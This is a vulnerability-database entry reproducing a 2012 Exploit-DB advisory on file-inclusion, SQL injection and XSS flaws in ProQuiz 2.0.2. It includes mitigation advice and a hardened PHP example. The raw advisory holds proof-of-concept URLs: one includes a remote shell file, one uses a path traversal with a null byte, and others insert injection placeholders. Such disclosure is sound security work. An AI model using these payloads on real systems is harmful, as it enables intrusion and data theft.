Vendor: ProQuiz
Author: L0n3ly-H34rT
CVSS: 7.5 (HIGH)
Vulnerability Type: Remote File Include, Local File Include, Remote SQL Injection & Blind SQL Injection
CWE: 94, 98, 89, 79
Product Name: ProQuiz
Affected Version From: 2.0.2
Affected Version To: 2.0.2
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Linux/Windows
Date: 2012

ProQuiz v2.0.2 – Multiple Vulnerabilities

ProQuiz v2.0.2 is vulnerable to Remote File Include, Local File Include, Remote SQL Injection & Blind SQL Injection. In my_account.php, lines 114 & 115, the code `if($_GET['action']=='getpage' && !empty($_GET['page'])){@include_once($_GET['page'].'.php');` builds an include path directly from the client-supplied `page` parameter, which allows both Remote File Include and Local File Include. In both cases an attacker only needs to register, log in to the panel and request a crafted URL. Remote SQL Injection & Blind SQL Injection affect two files: answers.php at line 55 (the `instid` URL parameter) and functions.php, where the `$_POST['email']` and `$_POST['username']` values are used unsanitized, so SQL can be injected through both the URL and the POST body.

Mitigation:

To mitigate Remote File Include & Local File Include, the application should map the requested page to a whitelist of allowed files and must not build an include path from a client-supplied file name. To mitigate Remote SQL Injection & Blind SQL Injection, the application should use parameterized queries (prepared statements) so that client-supplied values are bound as data and never concatenated into the SQL string.
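The following is an added example (not ProQuiz's own code) showing hardened replacements for the three patterns the advisory describes: the `page` include, the email lookup behind the password-recovery POST, and the reflected `instid` echo. The allow-list entries, the `users` table and the use of PDO are assumptions.

```php
<?php
// Added example, not ProQuiz code. Page keys, file names, table and
// column names, and the use of PDO are assumptions.

// 1. Hardened page loader: the client supplies only a key that is looked
//    up in a fixed allow-list. Nothing from the request reaches the path.
const ALLOWED_PAGES = [
    'profile' => 'pages/profile.php',   // assumed file names
    'results' => 'pages/results.php',
];

function resolvePage(string $key): ?string
{
    // A URL, a traversal sequence or a null byte is not a key in the
    // list, so it resolves to null and nothing is included.
    return ALLOWED_PAGES[$key] ?? null;
}

if (($_GET['action'] ?? '') === 'getpage') {
    $file = resolvePage((string)($_GET['page'] ?? ''));
    if ($file === null) {
        http_response_code(400);
        exit('Unknown page');
    }
    include_once __DIR__ . '/' . $file;
}

// 2. Parameterized lookup for the recovery email: the value is bound as
//    data by the driver instead of being concatenated into the query.
function findUserByEmail(PDO $db, string $email): ?array
{
    $stmt = $db->prepare('SELECT id, username FROM users WHERE email = :email');
    $stmt->execute([':email' => $email]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// 3. Output encoding for a reflected parameter such as instid, so that
//    markup in the value is rendered as text rather than interpreted.
function safeEcho(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_HTML5, 'UTF-8');
}
```

The same bound-parameter pattern applies to the `username` value handled by the `edit_profile` action.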
Source

Exploit-DB raw data:

####################################################
### Exploit Title: ProQuiz v2.0.2 - Multiple Vulnerabilities 
### Date: 18/7/2012 
### Author: L0n3ly-H34rT 
### My Site: http://se3c.blogspot.com/
### Contact: l0n3ly_h34rt@hotmail.com 
### Vendor Homepage: http://proquiz.softon.org/ 
### Software Link: http://code.google.com/p/proquiz/downloads/list
### Tested on: Linux/Windows 
####################################################

1- Remote File Include :

* In File (my_account.php) in line 114 & 115 :

if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php'); // include path built directly from the page parameter
}

* P.O.C :

First register and log in to your panel, then request this URL, e.g.:

http://127.0.0.1/full/my_account.php?action=getpage&page=http://127.0.0.1/shell.txt?

* Note :

Requires allow_url_include=On

-----------------------------------------------------------------------

2- Local File Include :

* In File (my_account.php) in line 114 & 115 :

if($_GET['action']=='getpage' && !empty($_GET['page'])){
@include_once($_GET['page'].'.php'); // include path built directly from the page parameter
}

* P.O.C :

First register and log in to your panel, then request this URL, e.g.:

http://127.0.0.1/full/my_account.php?action=getpage&page=../../../../../../../../../../windows/win.ini%00.jpg

* Note :

Requires magic_quotes_gpc = Off

---------------------------------------------------------------------

3- Remote SQL Injection & Blind SQL Injection :

* In Two Files :

A- First ( answers.php ) in line 55 :

<?php echo $_GET['instid']; ?>

B- Second ( functions.php ) In :

$_POST['email']

$_POST['username']

* P.O.C :

A- First :

http://127.0.0.1/full/answers.php?action=answers&instid=[SQL]

B- Second :

About Email :

In URL:

http://127.0.0.1/full/functions.php?action=recoverpass

Inject Here In POST Method :

email=[SQL]

About Username :

In URL:

http://127.0.0.1/full/functions.php?action=edit_profile&type=username

Inject Here In POST Method :

username=[SQL]

-------------------------------------------------------------------------------------

4 - Cross Site Scripting :

e.g.: http://127.0.0.1/full/answers.php?action=answers&instid=[XSS]

-----------------------------------------------------------------------------------

# Greetz to my friendz

References:

http://se3c.blogspot.com/
http://code.google.com/p/proquiz/downloads/list